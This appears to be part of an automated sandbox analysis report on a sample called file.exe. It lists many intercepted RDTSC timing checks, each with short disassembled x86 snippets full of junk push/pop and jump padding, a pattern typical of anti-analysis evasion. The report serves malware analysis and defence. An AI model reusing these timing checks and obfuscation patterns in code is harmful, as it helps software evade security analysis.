                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC8C0 second address: 8DC8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9D2 second address: 8DA9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCACD second address: 8DCAD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9D6 second address: 8DA9F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF9AB second address: 8DF9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9F5 second address: 8DA9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9F9 second address: 8DAA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E9917DE33h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8904BC second address: 8904C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCBB8 second address: 8DCBD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E219D second address: 8E21A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5276 second address: 8E5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F5E9917DE28h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E864A second address: 8E8657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F5E987E4116h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8657 second address: 8E8669 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8669 second address: 8E8673 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB32 second address: 8ECB36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB36 second address: 8ECB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5E987E4118h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E987E411Dh 0x00000013 jmp 00007F5E987E4120h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB63 second address: 8ECB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC325 second address: 8EC329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC329 second address: 8EC34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c jng 00007F5E9917DE32h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC34B second address: 8EC34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC34F second address: 8EC353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC353 second address: 8EC359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC359 second address: 8EC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5E9917DE32h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC378 second address: 8EC37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC37C second address: 8EC388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F208D second address: 8F20A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E987E4116h 0x0000000a popad 0x0000000b jl 00007F5E987E411Ch 0x00000011 jnp 00007F5E987E4116h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F20A4 second address: 8F20A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F20A9 second address: 8F20AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876F83 second address: 876F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F5E9917DE26h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876F94 second address: 876F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7B26 second address: 8F7B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7B2A second address: 8F7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E411Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F39 second address: 8F7F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F3D second address: 8F7F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E987E411Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F54 second address: 8F7F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F820E second address: 8F8215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F83D9 second address: 8F83DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F83DD second address: 8F83E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD6E5 second address: 8FD709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F5E9917DE33h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jnl 00007F5E9917DE26h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE322 second address: 8FE328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE328 second address: 8FE33F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4AD second address: 8FE4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5E987E4116h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4BD second address: 8FE4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4C3 second address: 8FE4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E411Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE624 second address: 8FE630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC6B second address: 87DC76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC76 second address: 87DC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9917DE2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC8E second address: 87DC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC94 second address: 87DC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEA64 second address: 8FEA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD3E8 second address: 8FD3F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90070B second address: 90070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906777 second address: 906792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5E9917DE26h 0x00000009 jmp 00007F5E9917DE30h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887FD3 second address: 887FE1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909F8A second address: 909F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F5E9917DE28h 0x0000000b js 00007F5E9917DE2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6357 second address: 8C635B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C635B second address: 8C638F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5E9917DE28h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ecx, 19AC73ABh 0x00000015 jno 00007F5E9917DE2Bh 0x0000001b lea eax, dword ptr [ebp+124880A1h] 0x00000021 mov edx, dword ptr [ebp+122D2350h] 0x00000027 nop 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C638F second address: 8C6393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6393 second address: 8C6397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6397 second address: 8C63A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F5E987E411Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C63A8 second address: 8AC3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dx, 7897h 0x0000000a call dword ptr [ebp+122D1846h] 0x00000010 pushad 0x00000011 push ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6880 second address: 8C6884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6958 second address: 8C697B instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2117213Ah 0x00000013 or dword ptr [ebp+122D17FFh], esi 0x00000019 push 50C495A4h 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B67 second address: 8C6B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B6D second address: 8C6B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B76 second address: 8C6B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B7A second address: 8C6B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D5C second address: 8C6D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D62 second address: 8C6D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D66 second address: 8C6D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F5E987E411Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D80 second address: 8C6DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5E9917DE28h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F5E9917DE28h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D27CAh] 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jng 00007F5E9917DE26h 0x00000051 jnl 00007F5E9917DE26h 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6DE8 second address: 8C6DFF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E987E411Ch 0x00000008 jno 00007F5E987E4116h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C71C4 second address: 8C71CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E9917DE26h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C71CF second address: 8C721F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F5E987E4126h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e je 00007F5E987E412Ch 0x00000014 nop 0x00000015 add cl, 00000003h 0x00000018 push 0000001Eh 0x0000001a mov ecx, esi 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jg 00007F5E987E4116h 0x00000026 push edx 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7649 second address: 8C7659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7659 second address: 8C766A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E411Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C766A second address: 8C7681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7681 second address: 8C7686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A373 second address: 90A38F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F5E9917DE26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A38F second address: 90A393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A6A7 second address: 90A6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA81 second address: 90AA87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA87 second address: 90AA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AA8D second address: 90AAA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5E987E4116h 0x00000009 jmp 00007F5E987E411Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AC2D second address: 90AC49 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E9917DE26h 0x00000008 jnp 00007F5E9917DE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8E6 second address: 90F8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8EC second address: 90F8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8F1 second address: 90F906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E411Bh 0x00000009 jno 00007F5E987E4116h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F906 second address: 90F91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91033E second address: 910361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E987E4116h 0x0000000a popad 0x0000000b push edx 0x0000000c jnp 00007F5E987E4116h 0x00000012 jc 00007F5E987E4116h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jnc 00007F5E987E4116h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91049A second address: 9104A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9104A1 second address: 9104C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E4120h 0x00000009 jmp 00007F5E987E411Eh 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9104C4 second address: 9104D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5E9917DE26h 0x00000009 jnp 00007F5E9917DE26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914887 second address: 914891 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914297 second address: 9142CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E9917DE35h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F5E9917DE26h 0x00000010 jmp 00007F5E9917DE37h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9142CD second address: 9142D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
